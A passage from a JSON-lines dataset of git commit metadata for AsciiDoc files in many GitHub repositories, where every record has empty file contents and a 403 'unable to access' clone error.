2017-12-08-A-W-S-Cloud9golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-A-W-S-Cloud9golang.adoc","new_file":"_posts\/2017-12-08-A-W-S-Cloud9golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24a7108df2a370321ebadc065b373eac28b7e148","subject":"Update 2016-07-03-Rights-and-Duties.adoc","message":"Update 2016-07-03-Rights-and-Duties.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05449c222b5a19925c836f0583c818edaf281381","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/05\/13\/deref.adoc","new_file":"content\/news\/2022\/05\/13\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"1a1b600956c91c0043780853a69d72de3a92491f","subject":"Forge 3.0.0.Beta4","message":"Forge 3.0.0.Beta4\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-01-27-forge-3.0.0.beta4.asciidoc","new_file":"news\/2016-01-27-forge-3.0.0.beta4.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e29a20db42dbe061daf031eb09ae278afa789b27","subject":"Add documentation for Consul extension","message":"Add documentation for Consul extension\n\nCo-authored-by: Guillaume Smet <a1413ddfdc82e6e4d34146c884b8167946ce8263@gmail.com>\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/consul-config.adoc","new_file":"docs\/src\/main\/asciidoc\/consul-config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d03f4a740641a7d6669f2fe4b2b53cbb476a3984","subject":"Update 2017-10-07-Privacy-Policy-for-coders-Dilemma.adoc","message":"Update 
2017-10-07-Privacy-Policy-for-coders-Dilemma.adoc","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-10-07-Privacy-Policy-for-coders-Dilemma.adoc","new_file":"_posts\/2017-10-07-Privacy-Policy-for-coders-Dilemma.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a408a85b6c33f76c390f755cc87e6ce750de34cc","subject":"Publish 19-02-2015-Manual-de-Git-En-Espanol.adoc","message":"Publish 19-02-2015-Manual-de-Git-En-Espanol.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"19-02-2015-Manual-de-Git-En-Espanol.adoc","new_file":"19-02-2015-Manual-de-Git-En-Espanol.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6e9f87b6e6af3b69c85f32666dca2a3a1d65081","subject":"Papyrus incubation auto inst","message":"Papyrus incubation auto inst\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db9f3971c6e78a9649f13b8b2e465f54dee66fb1","subject":"KUDU-661 Continuing work based on Todd's feedback","message":"KUDU-661 Continuing work based on Todd's feedback\n\nChange-Id: Ie14a71d00c76dc92fb01a3902a43ec435ae8110c\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/6467\nReviewed-by: Michael Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@cloudera.com>\nTested-by: Michael Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@cloudera.com>\n","repos":"EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu","old_file":"docs\/quickstart.adoc","new_file":"docs\/quickstart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"72eb50d3f3f9e2a8b2e28fba861d4404e94151a0","subject":"add user guide","message":"add user guide\n","repos":"ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor","old_file":"docs\/user_guide.adoc","new_file":"docs\/user_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/ECP-CANDLE\/Supervisor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"228e8465d3d80088872459b2bfcf3fc22b799464","subject":"y2b create post THE BOOTY MACHINE","message":"y2b create post THE BOOTY MACHINE","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-09-THE-BOOTY-MACHINE.adoc","new_file":"_posts\/2016-01-09-THE-BOOTY-MACHINE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c362216e2ddeed6001e32a378c8b9a68934f2c6","subject":"Publish 2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","message":"Publish 2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","new_file":"2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"814c0db41264cd4f27d6a88cc8c89a25a73d2068","subject":"Update 2018-09-10-Go.adoc","message":"Update 2018-09-10-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-10-Go.adoc","new_file":"_posts\/2018-09-10-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"091036152620726095a6c64ef10b584c6c6254a0","subject":"y2b create post 3 Cool Tech Deals - #5","message":"y2b create post 3 Cool Tech Deals - #5","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-07-15-3-Cool-Tech-Deals--5.adoc","new_file":"_posts\/2015-07-15-3-Cool-Tech-Deals--5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48336d6ac89bbec6609d7bb4f4685428c0e3f25b","subject":"y2b create post iPhone 7 Case Leak!","message":"y2b create post iPhone 7 Case Leak!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-03-17-iPhone-7-Case-Leak.adoc","new_file":"_posts\/2016-03-17-iPhone-7-Case-Leak.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"543428fbebe2ccf546684d8b9c1b95b0a27db5df","subject":"Delete the file at '_posts\/2017-05-31-Naming-Conventions.adoc'","message":"Delete the file at 
'_posts\/2017-05-31-Naming-Conventions.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Naming-Conventions.adoc","new_file":"_posts\/2017-05-31-Naming-Conventions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbdec216fec34942d50bfa1229b48c8fa58d4401","subject":"Add initial asciidoc notes","message":"Add initial asciidoc notes\n","repos":"jeaye\/jeaye.github.io,jeaye\/jeaye.github.io","old_file":"_drafts\/asciidoc.adoc","new_file":"_drafts\/asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jeaye\/jeaye.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40a67a7e6999a4c9c7265600ee33e4c5c2a240cb","subject":"y2b create post Does Size Matter?","message":"y2b create post Does Size Matter?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-07-07-Does-Size-Matter.adoc","new_file":"_posts\/2015-07-07-Does-Size-Matter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ce750efc5c3889556bd49785f1affc85ed61c24","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9822c0b5421c81d50c30484ec643069b86ac0b1d","subject":"another small fix","message":"another small fix\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"trex_toc.asciidoc","new_file":"trex_toc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"621691408d1bcdf90c07a20b0e363d1a6eede58f","subject":"Delete 2016-5-13-Engineer-Career-Path.adoc","message":"Delete 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec4d5e34b02c0e2902f2b71327cdf8353dc247a1","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"387a8e259ce84f5a445c6f7b74853649f48065cd","subject":"Update 2015-11-11-De-casa-nova.adoc","message":"Update 2015-11-11-De-casa-nova.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2015-11-11-De-casa-nova.adoc","new_file":"_posts\/2015-11-11-De-casa-nova.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4699d3d07640df9ba751bc7fc5c5a2eaf24a4ebb","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b8bb2fac22202c12c0116f023dfb40cda185691","subject":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e484e95aa4d7b8b7757ac4a9531d251282ad951c","subject":"Update 2015-02-11-New-try.adoc","message":"Update 2015-02-11-New-try.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-11-New-try.adoc","new_file":"_posts\/2015-02-11-New-try.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ee2c77c50149645247e9f81ead047273e8aed81","subject":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","message":"Update 
2016-02-03-Attention-or-Retention-or-Protention.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9a70ad9b3e2cd1751b37671aff76c15297d6baf","subject":"y2b create post I Bought The Cheapest Smartphone on Amazon...","message":"y2b create post I Bought The Cheapest Smartphone on Amazon...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-10-IBoughtTheCheapestSmartphoneonAmazon.adoc","new_file":"_posts\/2018-02-10-IBoughtTheCheapestSmartphoneonAmazon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31ae59b8a2c639d406eba1292a0b5aa740f4ecc0","subject":"Add 2018-08-09-forge-3.9.1.final.asciidoc","message":"Add 2018-08-09-forge-3.9.1.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2018-08-09-forge-3.9.1.final.asciidoc","new_file":"news\/2018-08-09-forge-3.9.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c3f89b2fc2bf64bf0557bdd5a25404cee1ef166d","subject":"DELTASPIKE-421 Documentation of optional query results","message":"DELTASPIKE-421 Documentation of optional query results\n","repos":"rafabene\/deltaspike,os890\/deltaspike-vote,subaochen\/deltaspike,rafabene\/deltaspike,os890\/deltaspike-vote,idontgotit\/deltaspike,rdicroce\/deltaspike,jharting\/deltaspike,subaochen\/deltaspike,Danny02\/deltaspike,danielsoro\/deltaspike,LightGuard\/incubator-deltaspike,struberg\/deltaspike,apache\/deltaspike,LightGuard\/incubator-deltaspike,apache\/deltaspike,chkal\/deltaspike,tremes\/deltaspike,os890\/DeltaSpikePlayground,struberg\/deltaspike,subaochen\/deltaspike,chkal\/deltaspike,tremes\/deltaspike,idontgotit\/deltaspike,idontgotit\/deltaspike,danielsoro\/deltaspike,tremes\/deltaspike,chkal\/deltaspike,mlachat\/deltaspike,LightGuard\/incubator-deltaspike,danielsoro\/deltaspike,rdicroce\/deltaspike,rdicroce\/deltaspike,struberg\/deltaspike,Danny02\/deltaspike,os890\/DS_Discuss,os890\/DS_Discuss,rdicroce\/deltaspike,os890\/deltaspike-vote,apache\/deltaspike,os890\/deltaspike-vote,jharting\/deltaspike,apache\/deltaspike,idontgotit\/deltaspike,chkal\/deltaspike,os890\/DeltaSpikePlayground,subaochen\/deltaspike,mlachat\/deltaspike,struberg\/deltaspike,os890\/DS_Discuss,os890\/DS_Discuss,Danny02\/deltaspike,Danny02\/deltaspike,jharting\/deltaspike,os890\/DeltaSpikePlayground,rafabene\/deltaspike,mlachat\/deltaspike,mlachat\/deltaspike,tremes\/deltaspike,danielsoro\/deltaspike","old_file":"deltaspike\/modules\/data\/README.adoc","new_file":"deltaspike\/modules\/data\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Danny02\/deltaspike.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"4560fc3ce9957da973305616347ea661797717a9","subject":"WIP(deferred-promise): Start","message":"WIP(deferred-promise): Start\n","repos":"azu\/promises-book,tangjinzhou\/promises-book,sunfurong\/promise,mzbac\/promises-book,sunfurong\/promise,genie88\/promises-book,tangjinzhou\/promises-book,lidasong2014\/promises-book,oToUC\/promises-book,oToUC\/promises-book,xifeiwu\/promises-book,xifeiwu\/promises-book,charlenopires\/promises-book,purepennons\/promises-book,mzbac\/promises-book,genie88\/promises-book,wenber\/promises-book,mzbac\/promises-book,cqricky\/promises-book,wenber\/promises-book,dieface\/promises-book,dieface\/promises-book,wangwei1237\/promises-book,wangwei1237\/promises-book,tangjinzhou\/promises-book,cqricky\/promises-book,wenber\/promises-book,azu\/promises-book,purepennons\/promises-book,lidasong2014\/promises-book,azu\/promises-book,dieface\/promises-book,azu\/promises-book,xifeiwu\/promises-book,wangwei1237\/promises-book,genie88\/promises-book,liubin\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,oToUC\/promises-book,liyunsheng\/promises-book,cqricky\/promises-book,liubin\/promises-book,liubin\/promises-book,charlenopires\/promises-book,liyunsheng\/promises-book,purepennons\/promises-book,charlenopires\/promises-book,liyunsheng\/promises-book","old_file":"Ch4_AdvancedPromises\/deferred-promise.adoc","new_file":"Ch4_AdvancedPromises\/deferred-promise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34bbd06caabff211b656716217c5be4484c1d7fd","subject":"Update 2016-04-16-This-is-all-we-are.adoc","message":"Update 2016-04-16-This-is-all-we-are.adoc","repos":"pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io","old_file":"_posts\/2016-04-16-This-is-all-we-are.adoc","new_file":"_posts\/2016-04-16-This-is-all-we-are.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pyxozjhi\/pyxozjhi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d438f9520694a6cd5f81c5490819ef875f9b5797","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92cb4d4af5991ec113afbcc8fff4588efeeb73e2","subject":"y2b create post LG G Watch Unboxing!","message":"y2b create post LG G Watch Unboxing!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-06-26-LG-G-Watch-Unboxing.adoc","new_file":"_posts\/2014-06-26-LG-G-Watch-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f60f95a22a36e48506deb227ec088159e2a7c4c4","subject":"Update 2016-05-24-Useful-Git-commands.adoc","message":"Update 2016-05-24-Useful-Git-commands.adoc","repos":"grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io","old_file":"_posts\/2016-05-24-Useful-Git-commands.adoc","new_file":"_posts\/2016-05-24-Useful-Git-commands.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grzrobak\/grzrobak.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a5405cf7de1055110701b8a439cc457e1f8bcab","subject":"y2b create post Huge Screen Gaming (Xbox 360 \\u0026 PS3)","message":"y2b create post Huge Screen Gaming (Xbox 360 \\u0026 PS3)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-17-Huge-Screen-Gaming-Xbox-360-u0026-PS3.adoc","new_file":"_posts\/2011-12-17-Huge-Screen-Gaming-Xbox-360-u0026-PS3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"391bb20de280cb1da6a59946e1b4bf33bee4b276","subject":"advanced_usage documentation (with all files)","message":"advanced_usage documentation (with all files)\n","repos":"Swagger2Markup\/swagger2markup,johanhammar\/swagger2markup","old_file":"src\/docs\/asciidoc\/advanced_usage.adoc","new_file":"src\/docs\/asciidoc\/advanced_usage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/johanhammar\/swagger2markup.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0fe0e727784b311e2b76f3b5a06d3a823d2006f4","subject":"Update custom fonts page.","message":"Update custom fonts page.\n\n","repos":"kironapublic\/vaadin,peterl1084\/framework,mstahv\/framework,peterl1084\/framework,peterl1084\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework,asashour\/framework,mstahv\/framework,peterl1084\/framework,Darsstar\/framework,mstahv\/framework,kironapublic\/vaadin,mstahv\/framework,asashour\/framework,kironapublic\/vaadin,mstahv\/framework,asashour\/framework,kironapublic\/vaadin,peterl1084\/framework,Darsstar\/framework,asashour\/framework,kironapublic\/vaadin","old_file":"documentation\/themes\/themes-fonts.asciidoc","new_file":"documentation\/themes\/themes-fonts.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterl1084\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"66ada795e822bfecc38ca7732fe79aa086846546","subject":"Update 2016-02-02-CONCEPTS.adoc","message":"Update 2016-02-02-CONCEPTS.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-02-CONCEPTS.adoc","new_file":"_posts\/2016-02-02-CONCEPTS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df52dd829e26b416bbf9f02465a7da078b9116b9","subject":"Update 
2016-12-16-testpost.adoc","message":"Update 2016-12-16-testpost.adoc","repos":"osada9000\/osada9000.github.io,osada9000\/osada9000.github.io,osada9000\/osada9000.github.io,osada9000\/osada9000.github.io","old_file":"_posts\/2016-12-16-testpost.adoc","new_file":"_posts\/2016-12-16-testpost.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/osada9000\/osada9000.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89fcb11a41f6007941c4bec6271e8e42aeb293ff","subject":"Update 2017-03-11-Poetry-2.adoc","message":"Update 2017-03-11-Poetry-2.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-03-11-Poetry-2.adoc","new_file":"_posts\/2017-03-11-Poetry-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f719235cc873600f54fefb531c05382a77eafdfb","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"393f9cf595380c3aaa0d1c30ce86a4bced8fcee0","subject":"Update 